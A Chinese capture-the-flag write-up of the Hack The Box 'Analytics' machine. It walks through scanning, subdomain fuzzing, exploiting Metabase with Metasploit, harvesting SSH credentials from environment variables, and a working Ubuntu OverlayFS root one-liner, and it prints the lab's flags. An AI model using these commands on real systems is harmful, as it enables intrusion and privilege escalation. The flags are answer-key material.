HTB-Analytics笔记

admin 2024年2月23日04:15:07评论15 views字数 1163阅读3分52秒阅读模式

HTB-Analytics笔记

首先扫描靶机

nmap -sC -sV -T4 -Pn 10.10.11.233

HTB-Analytics笔记

得到一个http://analytical.htb/的域名,写进去hosts,然后访问一下

HTB-Analytics笔记

是一个信息数据的网站,右上角有个login,点进去会重定向另一个网址

HTB-Analytics笔记

也可以通过fuzz出来这个子域名,这次我使用的是wfuzz

wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://analytical.htb/' -H 'Host: FUZZ.analytical.htb' --hl 7

HTB-Analytics笔记

写进去后,打开可以看到是一个Metabase网址

HTB-Analytics笔记

在网上可以搜到该Metabase的漏洞特点以及利用,Metasploit已经更新出

HTB-Analytics笔记

直接使用msfconsole搜这个漏洞,这次我使用armitage,cobalt strike的卵生兄妹

HTB-Analytics笔记

设置好参数,一把梭哈

HTB-Analytics笔记

HTB-Analytics笔记

变成了红色闪电,说明已经getshell了,输入hostname,可以看到是不对应靶场名字的,说明我们在docker容器里面,输入env命令查看环境参数,里面写了ssh用户跟密码

HTB-Analytics笔记

这次我用hydra验证一下ssh登录,其实就是重温一下工具

hydra -l metalytics -p An4lytics_ds20223# -vV -f ssh://10.10.11.233

HTB-Analytics笔记

看来是对的,用户是metalytics,密码是An4lytics_ds20223#,直接armitage登录ssh

HTB-Analytics笔记

成功拿到user flag:47e231e0d741fc4a9b9673e26c27855a

HTB-Analytics笔记

输入sudo -l跟find命令都没找到提权路径,看看内核

HTB-Analytics笔记

可以看到,有个内核版本的漏洞,可以参考这篇文章

Ubuntu Local Privilege Escalation (CVE-2023-2640 & CVE-2023-32629)
byu/sk1nT7 inselfhosted

HTB-Analytics笔记

输入这串命令,给/bin/bash权限,直接提权

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("chmod u+s /bin/bash")'

HTB-Analytics笔记

成功拿到root flag:f8594e260bde3d9333537ead9067c430

原文始发于微信公众号(Jiyou too beautiful):HTB-Analytics笔记

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日04:15:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   HTB-Analytics笔记http://cn-sec.com/archives/2112423.html

发表评论

匿名网友 填写信息